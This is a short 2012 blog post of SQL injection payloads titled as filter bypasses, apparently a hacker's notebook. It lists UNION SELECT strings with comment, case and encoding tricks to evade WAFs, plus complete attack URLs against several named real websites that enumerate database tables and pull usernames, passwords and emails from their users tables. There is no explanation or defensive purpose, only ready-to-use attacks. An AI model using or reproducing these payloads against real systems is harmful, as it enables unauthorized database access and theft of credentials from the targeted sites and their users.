Wednesday, July 11, 2012

BY PASS HAYE SQL INJECTION


answer=-999/**/union/**/select all 1,2,table_name,4,5,6,7,8,9,10,11,12/**/from/**/information_schema.tables --

union all select 1,table_name,3 from information_schema.tables/*  


/union /*!select*/ 1,concat_ws(0x7c,table_name),3,4,5,6 from information_schema./*!tables*/ where table_schema=database()-- -   


http://www.digitalflywheel.com/case.php?id=-4+union%20select%201,2,3,4,5,6,7,8,concat_ws%280x3a,username,0x3a,password%29+from+users+limit+1,1

http://www.gretchen-club.de/detail.php?id=-101+union+select+1,2,3,4,5,6,7,8,9,10,11,concat%28table_name,0x3a,column_name,0x3a,table_schema%29,13,14,15,16,17,18+from+information_schema.columns--
http://www.gretchen-club.de/detail.php?id=-101+union+select+1,2,3,4,5,6,7,8,9,10,11,concat%28table_name,0x3a3a,column_name%29,13,14,15,16,17,18+from+information_schema.columns--
http://www.gretchen-club.de/detail.php?id=-101+union+select+1,2,3,group_concat%28table_name%29,5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+information_schema.tables-- http://www.gretchen-club.de/detail.php?id=-101+union+select+1,2,3,group_concat%28column_name%29,5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+information_schema.columns+where+table_name=CHAR%28108,%20111,%20103,%20105,%20110%29

http://www.espaciologopedico.com/recursos/glosariodet.php?Id=-1+union+select+1,concat%28table_name,0x3a,column_name,0x3a,table_schema%29,3,4,5+from+information_schema.columns+where+column_name+LIKE+CHAR%28117,%20115,%20101,%20114%29
http://www.espaciologopedico.com/recursos/glosariodet.php?Id=-1+union+select+1,concat%28table_name,0x3a,column_name,0x3a,table_schema%29,3,4,5+from+information_schema.columns+where+column_name+LIKE+CHAR%28117,%20115,%20101,%20114%29+limit+2,5--


http://www.espaciologopedico.com/recursos/glosariodet.php?Id=-1+union+select+1,table_name,3,4,5+from+information_schema.tables+limit+1+offset+100-- 

answer=-999/**/union/**/select all 1,2,unhex(hex(table_name)),4,5,6,7,8,9,10,11,12/**/from/**/information_schema.tables -- 


jaye union %75%6E%69%6F%6E 
    


/*!UniON*/**/SeLeCT+1,2,3,4,5,6,7,8,9,10,11,12,13--

uni*on+sel*ect+1,2,3,4,5,6,7,8,9,10,11,12,13--

UnIoN/*&a=*/SeLeCT/*&a=*/1,2,3,4,5,6,7,8,9,10,11,12,13--

/*!UniON*/+aLl+/*!sELECt*/+1,2,3,4,5,6,7,8,9,10,11,12,13


http://www.hasharat.co.il/html/artist.php?id=-999.9%20UNION%20ALL%20SELECT%201,2,3,4,group_concat%28table_name%29,6,7,8,9+from%20information_schema.tables+where+table_schema=0x6861736861726174--
http://www.hasharat.co.il/html/artist.php?id=-999.9%20UNION%20ALL%20SELECT%201,2,3,4,group_concat%28column_name%29,6,7,8,9+from%20information_schema.columns+where+table_name=0x7573657273--
http://www.hasharat.co.il/html/artist.php?id=-999.9%20UNION%20ALL%20SELECT%201,2,3,4,group_concat%28id,0x3a,nick,0x3a,password,0x3a,email%29,6,7,8,9+from+users--
Posted by at

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)